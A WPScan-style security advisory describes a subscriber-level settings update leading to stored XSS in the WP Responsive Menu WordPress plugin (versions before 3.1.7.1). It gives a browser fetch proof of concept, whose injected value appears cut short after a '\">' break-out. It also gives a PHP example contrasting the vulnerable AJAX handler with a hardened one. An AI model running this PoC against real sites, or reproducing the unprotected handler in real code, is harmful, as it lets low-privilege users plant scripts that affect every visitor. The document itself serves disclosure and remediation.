Source: wpvulndb
Author: Krzysztof Zając
WPVDB-ID: 661CB7E3-D7BD-4BC1-BF78-BDB4BA9610D7
Published: Jan 26, 2022 - 12:00 a.m.

WP Responsive Menu < 3.1.7.1 - Subscriber+ Settings Update to Stored XSS

Source: wpscan.com

EPSS: 0.001 (Low), percentile 24.8%

The plugin has neither a capability check nor a CSRF (nonce) check in the wpr_live_update AJAX action, and it does not sanitise or escape some of the submitted data. Because the wp_ajax_ hook is reachable by any logged-in user, any authenticated user, such as a subscriber, can update the plugin's settings and thereby perform stored Cross-Site Scripting attacks against every visitor and user of the frontend.

PoC

Run from the browser of a logged-in low-privilege user (same-origin fetch sends the session cookies by default):

fetch("https://example.com/wp-admin/admin-ajax.php", {
    "headers": { "content-type": "application/x-www-form-urlencoded" },
    "body": "action=wpr_live_update&wprmenu_options[enabled]=1&wprmenu_options[position]=\">",
    "method": "POST",
})
    .then(response => response.text())
    .then(function (data) {
        console.log(data);
        // second call rebuilds the cached settings so the injected value is rendered
        fetch("https://example.com/wp-admin/admin-ajax.php", {
            "headers": { "content-type": "application/x-www-form-urlencoded" },
            "body": "action=wpr_get_transient_from_data",
            "method": "POST",
        });
    });

The XSS will be triggered on all frontend pages.
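The three missing controls named in the description (authorisation, CSRF protection, input/output handling) are easiest to see side by side. The following is an added example in the shape of a WordPress AJAX handler; it is not the plugin's own code. The action name wpr_live_update and the option key wprmenu_options are taken from the PoC above; the function names, the nonce action 'wpr_live_update_nonce', the manage_options capability and the allow-list of setting values are assumptions made for the example.

```php
<?php
/**
 * Added example, not WP Responsive Menu's code. Hypothetical names:
 * example_* functions, the nonce action 'wpr_live_update_nonce', the
 * settings allow-list. Action and option key are from the advisory's PoC.
 */

// --- Vulnerable pattern (shown for contrast; deliberately NOT hooked below).
// wp_ajax_ hooks fire for every logged-in role, so without a capability
// check a subscriber reaches this, and without a nonce any site can CSRF an admin into it.
function example_wpr_live_update_vulnerable() {
    $raw = isset( $_POST['wprmenu_options'] ) ? wp_unslash( $_POST['wprmenu_options'] ) : array();
    update_option( 'wprmenu_options', $raw ); // stored verbatim, rendered later unescaped
    wp_die();
}

// --- Hardened pattern: this is the one registered on the hook.
add_action( 'wp_ajax_wpr_live_update', 'example_wpr_live_update_secure' );
function example_wpr_live_update_secure() {
    // 1. CSRF: nonce bound to this action, read from the '_ajax_nonce' POST field;
    //    check_ajax_referer() ends the request with HTTP 403 when it does not verify.
    check_ajax_referer( 'wpr_live_update_nonce', '_ajax_nonce' );

    // 2. Authorisation: a valid nonce only proves the request came from a page we
    //    served; the role check is separate and is what stops the subscriber.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'insufficient privileges', 403 );
    }

    // 3. Input validation: accept only known keys and coerce each to its expected type.
    $raw = ( isset( $_POST['wprmenu_options'] ) && is_array( $_POST['wprmenu_options'] ) )
        ? wp_unslash( $_POST['wprmenu_options'] )
        : array();
    $allowed_positions = array( 'left', 'right' ); // assumed allow-list
    $position = isset( $raw['position'] ) ? (string) $raw['position'] : '';
    $clean = array(
        'enabled'    => empty( $raw['enabled'] ) ? 0 : 1,
        'position'   => in_array( $position, $allowed_positions, true ) ? $position : 'left',
        // free-text field: strip tags and control characters, HTML is not accepted
        'menu_title' => sanitize_text_field( isset( $raw['menu_title'] ) ? $raw['menu_title'] : '' ),
    );
    update_option( 'wprmenu_options', $clean );
    wp_send_json_success( $clean );
}

// --- Output escaping on the frontend, chosen per context regardless of what is stored.
function example_wprmenu_render() {
    $opts = (array) get_option( 'wprmenu_options', array() );
    // Attribute context: esc_attr() neutralises a '">' style break-out;
    // element content: esc_html().
    printf(
        '<div class="wprmenu" data-position="%s">%s</div>',
        esc_attr( isset( $opts['position'] ) ? $opts['position'] : '' ),
        esc_html( isset( $opts['menu_title'] ) ? $opts['menu_title'] : '' )
    );
}

// --- Admin side: hand the nonce to the settings page script so legitimate saves pass step 1.
function example_wprmenu_admin_scripts() {
    wp_localize_script(
        'wprmenu-admin', // assumed handle of the plugin's admin script
        'wprmenuAjax',
        array( '_ajax_nonce' => wp_create_nonce( 'wpr_live_update_nonce' ) )
    );
}
add_action( 'admin_enqueue_scripts', 'example_wprmenu_admin_scripts' );
```

With the hardened handler in place, the PoC request above fails at the nonce check (403) before any option is written, and even if an administrator's own session were tricked into sending the same body, the position value would be rejected by the allow-list and, if a free-text field carried the payload, esc_attr()/esc_html() would render it inert. The fix needs all three layers: a nonce alone does not stop the subscriber, and a capability check alone does not stop CSRF against an administrator.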

Affected versions (CPE):

CPE name            Operator   Version
wp-responsive-menu  lt         3.1.7.1

